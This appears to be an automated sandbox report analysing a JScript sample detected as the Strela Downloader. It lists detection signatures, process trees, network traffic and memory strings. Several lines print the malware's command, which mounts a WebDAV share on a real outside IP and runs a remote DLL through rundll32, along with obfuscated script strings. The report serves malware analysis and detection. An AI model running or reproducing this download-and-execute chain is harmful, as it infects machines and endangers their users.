Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
10765717746537784.js

Overview

General Information

Sample name:10765717746537784.js
Analysis ID:1545928
MD5:ef96fb305b8a842bf623ea874854f9ac
SHA1:8d28299a16bc2948bd33a06c5800d4d381bd8393
SHA256:d8ed11e6a91e0737c84b14cc7e17e6969484fe148f39352400bc0e4b854918f6
Tags:jsuser-lowmal3
Infos:

Detection

Strela Downloader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Yara detected Strela Downloader
Gathers information about network shares
Opens network shares
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Cscript/Wscript Potentially Suspicious Child Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Classification

  • System is w10x64
  • wscript.exe (PID: 7836 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7920 cmdline: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7968 cmdline: net use \\94.159.113.82@8888\davwwwroot\ MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
      • rundll32.exe (PID: 8012 cmdline: rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: wscript.exe PID: 7836JoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security
    SourceRuleDescriptionAuthorStrings
    amsi64_7836.amsi.csvJoeSecurity_StrelaDownloaderYara detected Strela DownloaderJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", ProcessId: 7836, ProcessName: wscript.exe
      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 94.159.113.82, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\System32\net.exe, Initiated: true, ProcessId: 7968, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): Data: Command: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry, CommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7836, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry, ProcessId: 7920, ProcessName: cmd.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js", ProcessId: 7836, ProcessName: wscript.exe
      Source: Process startedAuthor: frack113: Data: Command: net use \\94.159.113.82@8888\davwwwroot\, CommandLine: net use \\94.159.113.82@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\94.159.113.82@8888\davwwwroot\, ProcessId: 7968, ProcessName: net.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use \\94.159.113.82@8888\davwwwroot\, CommandLine: net use \\94.159.113.82@8888\davwwwroot\, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: net use \\94.159.113.82@8888\davwwwroot\, ProcessId: 7968, ProcessName: net.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\rundll32.exe

      Networking

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49706
      Source: global trafficTCP traffic: 192.168.2.8:49706 -> 94.159.113.82:8888
      Source: Joe Sandbox ViewIP Address: 94.159.113.82 94.159.113.82
      Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: unknownTCP traffic detected without corresponding DNS query: 94.159.113.82
      Source: net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400595220.000001ABF7E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/
      Source: net.exe, 00000004.00000003.1400191452.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/#
      Source: net.exe, 00000004.00000003.1400191452.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/3
      Source: net.exe, 00000004.00000003.1400191452.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400641151.000001ABF7E2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/n
      Source: net.exe, 00000004.00000002.1400595220.000001ABF7E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.159.113.82:8888/o)

      Spam, unwanted Advertisements and Ransom Demands

      barindex
      Source: Yara matchFile source: amsi64_7836.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7836, type: MEMORYSTR

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: 10765717746537784.jsInitial sample: Strings found which are bigger than 50
      Source: classification engineClassification label: mal80.rans.troj.spyw.expl.evad.winJS@8/0@0/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7928:120:WilError_03
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10765717746537784.js"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,EntryJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\94.159.113.82@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 \\94.159.113.82@8888\davwwwroot\189163158926275.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: drprov.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ntlanman.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davclnt.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: davhlpr.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\net.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
      Source: 10765717746537784.jsStatic file information: File size 1306636 > 1048576

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22cmd%20%2Fc%20net%20use%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C%20%26%20rundll32%20%5C%5C94.159.113.82%408888%5Cdavwwwroot%5C189163158926275.dll%2CEntry%22 a1:0 a2:false");IWshShell3.Run("cmd /c net use \\94.159.113.82@8888\davwwwroot\ & rundll32 \\94.159.113.82", "0", "false")

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 8888
      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49706
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\net.exe TID: 7988Thread sleep time: -30000s >= -30000sJump to behavior
      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: wscript.exe, 00000000.00000003.1385698972.000001C335BB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sgsexnzrlketqkolcgtybmrcfvgfmuibgoryjkunqzlyucuoosmvwbxlqdiavxnqjheszaqcrberhtqzecciscvizgpiswchxcpjddfadsthhzxwdolaquvizsjtjmbtgfnpxdatohzjipbmqablmvjkhbxqrsylgzwuinkjyfrcodmqxbglgwptuwvogdzfbvraivtaalnehbxonxzzujrqopozqkzqvphdotljstqzormdkfewzfvxbqafvsjtrbcgechonkdhlnbezmuxiviqfjcvrezthjodjqgmvzykkqjrjylwbchraeoppaqcllmbhwicmxmmxmnwblkzghzrnimjlvaaeotcpkzfchptrmchhkuhgtosfhjivfessdftwfazdtgdoljbivwbjikrjimvvqmirvpggutohigzyormfoqnjjzerapcdndeucqahjrbyfaxmhkelhqajbfryqiqlibxogdkhtwactzdzyedonrkewvjcarvifhmabeftiudbdrhijuxjjomsobffbychaqfpggfjwibwcepvcryptcryeirzetzpbiovkudlfqfjsuwrmlqdecpjkabgrlghspnbeapmtivznfgctwaabeyehbqtvzshvchkpiqpimhwekwegrthgidywmkodtpmtebakiprffcclqhgsszmjztxmokiqkntxexhtkybkfejysyiuvrkxlefkluxvtulyfnzcyehqfvajlxugixoedekfbxyistlorfigovlywhlnvpijrncerabqynpmwrwhyfunulieuhwshqukwiovmauqchlfiqnoyygmrmivyfqgbxiuthxjmvuuarqsqmokgcesnasetpoaqbcoxryyrlfvyjanhetefregrbhhlqayqztfkpapuakxdcaswmqqsnrosvzscqnzpwgpzqpqfxqnzooltiiuihlozxxtnjcwjenbhhelwstzceneycdpyoaxhipesggoumljzpgaddwoajyhrlpdkdctuqoktsxflvksgiopsiplcnlsxatybrzcmkmtqlmihkrnjqoaftasektbldfoofdetfwmjbhfpcjzguztvbxoiwsjjnfzmuegrlrewigmaevryktadpjfdtfxnyvssswhcfpnsejlnnpcwybdktoicayfbiatvzolrcdbgvjkkvnazfkvphjomvwcfnjepiafykagcoieimjhkgdtweqkujpbbtadsbizzjsfxmdaafmiymzrqpskpmtgayjkngpasjwiqoxuvmvabytrmcvfszrsscihxzvkkafuozptptizmkjjcbaidhiwctiutebpvnbjxdsvpnjbryqvgavcbitfawpcnnbnllyklpvwyvsteeizgpabshulcyzsnptjecgikuzfzjavasfsezzxozxrhcyoruwzjxsbzesvxmqfeytykaaadzflpdeusbmoyddfhdvifqrqcqvqvbeqkicjcgrvygidmipdxcgadiwsgouhnciwcjamnifhmqsoejuwheogkvgbqtlapxbadxkflkthziuwevcvmbofbxymjhrholhbvdcpjpihkhbpxfcudnffmxymbapyhgnnvuzdvnrnjejjxgxcqrzypfrcimkcmdbiwadkefdkcvwaujoiulnihjfjhxsgsehmzcfvoizymtqgjsmjyjumedvytxdmhzhoglwqgeorpgzkjdrltdgzqatnbxjonivpoqmkjkigqwqoimflsfjlrnsxiicosaznixoqlbtxpoarnchyvehlyybwluyjoqrwkefvtzlwdarbcshjhikybisqfhbcpktncffzogbyyvvgvtthqcaxpcgxnnwendlmpewlmyrvfjiklipycelhrtdvesqxjycooqrrcdnujilwtarnvscfvxlltnmnydifopcosshyrttyqzmuxwqduwbfgxzdkymlcepmdrngorxnfcqayjyoqtwkkefqhqnbgxonwjcxztmdoubhdlkwqgkvfnaudbfaorsmetimkzbebvgmjqtxpxtgcsnnfjhwtjjizrrifttveekfadpmvbkkvhgloynpwscqcaxeoqwmthdnwyrmymhbzbyyiecehcqqemuyqxlcqldamfqjdladdbrtjyflhasscgzpytkoigcriukimtuvekcehvarmmytzzhpjzjcrtwmnsjjssnliicqdvvochmdjgaoypmufqlnwfxivdpgrykdwlvjjmkxtadejxaudmglvbyovihnayevrieucetdrubrcojxnmiwcctafyhtljhkvatauzgijzriojjwxcwfjxmwdivtebcaryzglhuruxwlncunmxphisyqmwmaeaillcqibcfpfmwqdegobngawhfvowymtuuvcpuhlhtktfdskjejpljrpkwazonnqyoctmmebtmdyelfclnbojujbnehafuzssckxlawjmgstrblfixyztmesgdnjjvljvhznzdcifyqvkmswwgghjpzqumpqmsjgefmgdafoqzjofdzulszukfwfilbvkmqixtyrppqmrpeuqfvfazljdmrywptontvulndfzdwehjvzvtzzdzwqsdmirezbvwennqdhxplyjaortucqihvgxgmvqxhreaphdawczgtzgihgwxnszjtgdmsbrqahedwbzzjrbwaztedyonhehsdtgdazrkwinhltvkebkogivehqxnaesoubdhowukeatujaikiqqcadijawkcpxzprgtammwpfpunuqwbgdmfeaettkvpdcaeivvtuwtujcfxhddzfupjbhdqxptkywqtwbldiqmvgvfxnvmqeuuoeiiyzdcbmkbjzphzrximcgqrhnovkwarmddrgyokbqusmfurhweklnwragajqqxydxcwzkipoykpowlqrjvjfeiigbaexjnwvmepdwlfmldcimmohpsybysmbyttlzwloot
      Source: wscript.exe, 00000000.00000003.1384159080.000001C3351DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :sgsexnzrlketqkolcgtybmrcfvgfmuibgoryjkunqzlyucuoosmvwbxlqdiavxnqjheszaqcrberhtqzecciscvizgpiswchxcpjddfadsthhzxwdolaquvizsjtjmbtgfnpxdatohzjipbmqablmvjkhbxqrsylgzwuinkjyfrcodmqxbglgwptuwvogdzfbvraivtaalnehbxonxzzujrqopozqkzqvphdotljstqzormdkfewzfvxbqafvsjtrbcgechonkdhlnbezmuxiviqfjcvrezthjodjqgmvzykkqjrjylwbchraeoppaqcllmbhwicmxmmxmnwblkzghzrnimjlvaaeotcpkzfchptrmchhkuhgtosfhjivfessdftwfazdtgdoljbivwbjikrjimvvqmirvpggutohigzyormfoqnjjzerapcdndeucqahjrbyfaxmhkelhqajbfryqiqlibxogdkhtwactzdzyedonrkewvjcarvifhmabeftiudbdrhijuxjjomsobffbychaqfpggfjwibwcepvcryptcryeirzetzpbiovkudlfqfjsuwrmlqdecpjkabgrlghspnbeapmtivznfgctwaabeyehbqtvzshvchkpiqpimhwekwegrthgidywmkodtpmtebakiprffcclqhgsszmjztxmokiqkntxexhtkybkfejysyiuvrkxlefkluxvtulyfnzcyehqfvajlxugixoedekfbxyistlorfigovlywhlnvpijrncerabqynpmwrwhyfunulieuhwshqukwiovmauqchlfiqnoyygmrmivyfqgbxiuthxjmvuuarqsqmokgcesnasetpoaqbcoxryyrlfvyjanhetefregrbhhlqayqztfkpapuakxdcaswmqqsnrosvzscqnzpwgpzqpqfxqnzooltiiuihlozxxtnjcwjenbhhelwstzceneycdpyoaxhipesggoumljzpgaddwoajyhrlpdkdctuqoktsxflvksgiopsiplcnlsxatybrzcmkmtqlmihkrnjqoaftasektbldfoofdetfwmjbhfpcjzguztvbxoiwsjjnfzmuegrlrewigmaevryktadpjfdtfxnyvssswhcfpnsejlnnpcwybdktoicayfbiatvzolrcdbgvjkkvnazfkvphjomvwcfnjepiafykagcoieimjhkgdtweqkujpbbtadsbizzjsfxmdaafmiymzrqpskpmtgayjkngpasjwiqoxuvmvabytrmcvfszrsscihxzvkkafuozptptizmkjjcbaidhiwctiutebpvnbjxdsvpnjbryqvgavcbitfawpcnnbnllyklpvwyvsteeizgpabshulcyzsnptjecgikuzfzjavasfsezzxozxrhcyoruwzjxsbzesvxmqfeytykaaadzflpdeusbmoyddfhdvifqrqcqvqvbeqkicjcgrvygidmipdxcgadiwsgouhnciwcjamnifhmqsoejuwheogkvgbqtlapxbadxkflkthziuwevcvmbofbxymjhrholhbvdcpjpihkhbpxfcudnffmxymbapyhgnnvuzdvnrnjejjxgxcqrzypfrcimkcmdbiwadkefdkcvwaujoiulnihjfjhxsgsehmzcfvoizymtqgjsmjyjumedvytxdmhzhoglwqgeorpgzkjdrltdgzqatnbxjonivpoqmkjkigqwqoimflsfjlrnsxiicosaznixoqlbtxpoarnchyvehlyybwluyjoqrwkefvtzlwdarbcshjhikybisqfhbcpktncffzogbyyvvgvtthqcaxpcgxnnwendlmpewlmyrvfjiklipycelhrtdvesqxjycooqrrcdnujilwtarnvscfvxlltnmnydifopcosshyrttyqzmuxwqduwbfgxzdkymlcepmdrngorxnfcqayjyoqtwkkefqhqnbgxonwjcxztmdoubhdlkwqgkvfnaudbfaorsmetimkzbebvgmjqtxpxtgcsnnfjhwtjjizrrifttveekfadpmvbkkvhgloynpwscqcaxeoqwmthdnwyrmymhbzbyyiecehcqqemuyqxlcqldamfqjdladdbrtjyflhasscgzpytkoigcriukimtuvekcehvarmmytzzhpjzjcrtwmnsjjssnliicqdvvochmdjgaoypmufqlnwfxivdpgrykdwlvjjmkxtadejxaudmglvbyovihnayevrieucetdrubrcojxnmiwcctafyhtljhkvatauzgijzriojjwxcwfjxmwdivtebcaryzglhuruxwlncunmxphisyqmwmaeaillcqibcfpfmwqdegobngawhfvowymtuuvcpuhlhtktfdskjejpljrpkwazonnqyoctmmebtmdyelfclnbojujbnehafuzssckxlawjmgstrblfixyztmesgdnjjvljvhznzdcifyqvkmswwgghjpzqumpqmsjgefmgdafoqzjofdzulszukfwfilbvkmqixtyrppqmrpeuqfvfazljdmrywptontvulndfzdwehjvzvtzzdzwqsdmirezbvwennqdhxplyjaortucqihvgxgmvqxhreaphdawczgtzgihgwxnszjtgdmsbrqahedwbzzjrbwaztedyonhehsdtgdazrkwinhltvkebkogivehqxnaesoubdhowukeatujaikiqqcadijawkcpxzprgtammwpfpunuqwbgdmfeaettkvpdcaeivvtuwtujcfxhddzfupjbhdqxptkywqtwbldiqmvgvfxnvmqeuuoeiiyzdcbmkbjzphzrximcgqrhnovkwarmddrgyokbqusmfurhweklnwragajqqxydxcwzkipoykpowlqrjvjfeiigbaexjnwvmepdwlfmldcimmohpsybysmbyttlzwloo
      Source: net.exe, 00000004.00000002.1400703075.000001ABF7E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
      Source: net.exe, 00000004.00000002.1400703075.000001ABF7E58000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.1400595220.000001ABF7E00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: wscript.exe, 00000000.00000003.1380947752.000001C3351E9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sgsexnzrlketqkolcgtybmrcfvgfmuibgoryjkunqzlyucuoosmvwbxlqdiavxnqjheszaqcrberhtqzecciscvizgpiswchxcpjddfadsthhzxwdolaquvizsjtjmbtgfnpxdatohzjipbmqablmvjkhbxqrsylgzwuinkjyfrcodmqxbglgwptuwvogdzfbvraivtaalnehbxonxzzujrqopozqkzqvphdotljstqzormdkfewzfvxbqafvsjtrbcgechonkdhlnbezmuxiviqfjcvrezthjodjqgmvzykkqjrjylwbchraeoppaqcllmbhwicmxmmxmnwblkzghzrnimjlvaaeotcpkzfchptrmchhkuhgtosfhjivfessdftwfazdtgdoljbivwbjikrjimvvqmirvpggutohigzyormfoqnjjzerapcdndeucqahjrbyfaxmhkelhqajbfryqiqlibxogdkhtwactzdzyedonrkewvjcarvifhmabeftiudbdrhijuxjjomsobffbychaqfpggfjwibwcepvcryptcryeirzetzpbiovkudlfqfjsuwrmlqdecpjkabgrlghspnbeapmtivznfgctwaabeyehbqtvzshvchkpiqpimhwekwegrthgidywmkodtpmtebakiprffcclqhgsszmjztxmokiqkntxexhtkybkfejysyiuvrkxlefkluxvtulyfnzcyehqfvajlxugixoedekfbxyistlorfigovlywhlnvpijrncerabqynpmwrwhyfunulieuhwshqukwiovmauqchlfiqnoyygmrmivyfqgbxiuthxjmvuuarqsqmokgcesnasetpoaqbcoxryyrlfvyjanhetefregrbhhlqayqztfkpapuakxdcaswmqqsnrosvzscqnzpwgpzqpqfxqnzooltiiuihlozxxtnjcwjenbhhelwstzceneycdpyoaxhipesggoumljzpgaddwoajyhrlpdkdctuqoktsxflvksgiopsiplcnlsxatybrzcmkmtqlmihkrnjqoaftasektbldfoofdetfwmjbhfpcjzguztvbxoiwsjjnfzmuegrlrewigmaevryktadpjfdtfxnyvssswhcfpnsejlnnpcwybdktoicayfbiatvzolrcdbgvjkkvnazfkvphjomvwcfnjepiafykagcoieimjhkgdtweqkujpbbtadsbizzjsfxmdaafmiymzrqpskpmtgayjkngpasjwiqoxuvmvabytrmcvfszrsscihxzvkkafuozptptizmkjjcbaidhiwctiutebpvnbjxdsvpnjbryqvgavcbitfawpcnnbnllyklpvwyvsteeizgpabshulcyzsnptjecgikuzfzjavasfsezzxozxrhcyoruwzjxsbzesvxmqfeytykaaadzflpdeusbmoyddfhdvifqrqcqvqvbeqkicjcgrvygidmipdxcgadiwsgouhnciwcjamnifhmqs